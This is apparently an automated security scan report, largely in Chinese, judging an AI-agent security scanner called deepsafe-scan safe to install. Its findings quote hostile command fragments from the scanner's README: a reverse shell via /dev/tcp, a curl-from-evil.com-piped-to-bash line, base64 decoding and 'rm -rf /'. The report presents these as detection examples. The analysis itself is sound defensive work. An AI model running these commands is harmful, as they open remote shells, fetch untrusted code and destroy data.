Scan Report
This report was generated in Chinese. Some content may be in Chinese.
0 /100
deepsafe-scan
AI coding agent 环境的 preflight 安全扫描器,扫描 5 个维度:posture(配置)、skill(技能/MCP)、memory(会话)、hooks(注入检测)、model(行为探针)
deepsafe-scan 是合法的开源安全扫描器,所有代码行为与文档声明完全一致,pre-scan 在 README.md 中标记的 5 个 CRITICAL IOC 均为文档示例(演示 hooks 扫描器检测模式),并非实际恶意代码。
Safe to install
该技能可安全使用。所有模块的声明能力与实际行为一致,无阴影功能、无数据外泄、无凭证收割。
| Resource | Declared | Inferred | Status | Evidence |
|---|---|---|---|---|
| Filesystem | READ | READ | ✓ Aligned | SKILL.md:allowed-tools 声明 Read; scripts/scan.py 通过 open() 读取目标文件用于静态分析,未写入目标扫描目录 |
| Shell | WRITE | WRITE | ✓ Aligned | SKILL.md:allowed-tools 声明 Bash(python3:*,cat:*); scripts/scan.py:subprocess.run(… |
| Network | NONE | READ | ✓ Aligned | llm_client.py:urllib 用于向 LLM API(ANTHROPIC_API_KEY 或 OPENAI_API_KEY 对应的 API 端点)发… |
| Environment | NONE | READ | ✓ Aligned | llm_client.py:resolve_llm_client() 读取 ANTHROPIC_API_KEY/OPENAI_API_KEY/OPENCLAW_… |
| Skill Invoke | READ | READ | ✓ Aligned | scan.py:sys.path.insert + import llm_client 动态加载同目录模块;run_model_probes() 通过 subp… |
| Clipboard | NONE | NONE | — | 代码中无任何剪贴板访问 |
| Browser | NONE | NONE | — | 代码中无浏览器调用 |
| Database | NONE | NONE | — | 代码中无数据库访问 |
5 Critical 15 findings
Critical Dangerous Command 危险 Shell 命令
bash -i >& README.md:155 Critical Dangerous Command 危险 Shell 命令
/dev/tcp/ README.md:155 Critical Dangerous Command 危险 Shell 命令
curl https://evil.com/x.sh \| bash README.md:156 Critical Encoded Execution Base64 编码执行(代码混淆)
base64 -d README.md:159 Critical Dangerous Command 危险 Shell 命令
rm -rf / README.md:161 Medium External URL 外部 URL
https://img.shields.io/badge/python-3.9%2B-blue.svg README.md:5 Medium External URL 外部 URL
https://python.org README.md:5 Medium External URL 外部 URL
https://img.shields.io/badge/deps-zero-green.svg README.md:6 Medium External URL 外部 URL
https://img.shields.io/badge/works%20with-OpenClaw%20%7C%20Claude%20Code%20%7C%20Cursor%20%7C%20Codex-blueviolet.svg README.md:7 Medium External URL 外部 URL
https://evil.com/x.sh README.md:156 Medium External URL 外部 URL
https://healthcheck.dev-tools.sh/ping demo/awesome-ai-rules/AGENTS.md:19 Medium External URL 外部 URL
https://api.analytics-cdn.dev/v1/event demo/awesome-ai-rules/CLAUDE.md:15 Medium External URL 外部 URL
http://127.0.0.1:11434/v1 scripts/probes/persuasion_probe.py:391 Medium External URL 外部 URL
https://hooks\.slack\.com/services/T[A-Z0-9 scripts/scan.py:932 Info Email 邮箱地址
[email protected] README.md:157 File Tree
19 files · 264.4 KB · 5683 lines Python 6f · 3481L
Markdown 8f · 1232L
JSON 4f · 967L
Text 1f · 3L
├─
▾
data
│ ├─
halueval_samples.json
JSON
│ ├─
manipulation_persuasion_topics.json
JSON
│ ├─
prompts.json
JSON
│ └─
qa_evaluation_instruction.txt
Text
├─
▾
demo
│ └─
▾
awesome-ai-rules
│ ├─
AGENTS.md
Markdown
│ ├─
CLAUDE.md
Markdown
│ └─
README.md
Markdown
├─
▾
docs
│ └─
plan-cross-platform-evolution.md
Markdown
├─
▾
scripts
│ ├─
▾
probes
│ │ ├─
deception_probe.py
Python
│ │ ├─
halueval_probe.py
Python
│ │ ├─
persuasion_probe.py
Python
│ │ └─
sandbagging_probe.py
Python
│ ├─
llm_client.py
Python
│ └─
scan.py
Python
├─
_meta.json
JSON
├─
AGENTS.md
Markdown
├─
CLAUDE.md
Markdown
├─
README.md
Markdown
└─
SKILL.md
Markdown
Dependencies 1 items
| Package | Version | Source | Known Vulns | Notes |
|---|---|---|---|---|
Python 3 标准库(urllib/urllib.error/urllib.request) | 内置 | stdlib | No | 零第三方依赖,无供应链风险 |
Security Positives
✓ 零外部依赖(仅使用 Python 标准库 urllib),无供应链风险
✓ 所有 4 个静态模块(posture/skill/memory/hooks)无需 API key 即可运行
✓ LLM 凭证自动检测(OpenClaw Gateway / ANTHROPIC_API_KEY / OPENAI_API_KEY),无硬编码密钥
✓ 模型探针(persuasion/sandbagging/deception/halueval)使用真实数据集(DeepSafe/DeceptionBench/HaluEval),逻辑严谨
✓ SKILL.md 声明了 allowed-tools,权限边界清晰
✓ 缓存系统(SHA256 指纹 + TTL)防止重复扫描开销
✓ 无 eval/exec/child_process/subprocess 在扫描器自身代码中的恶意使用
✓ README.md 中标记的 CRITICAL IOC 全部为文档示例(表格中的检测模式说明行),经验证均为无害的文档内容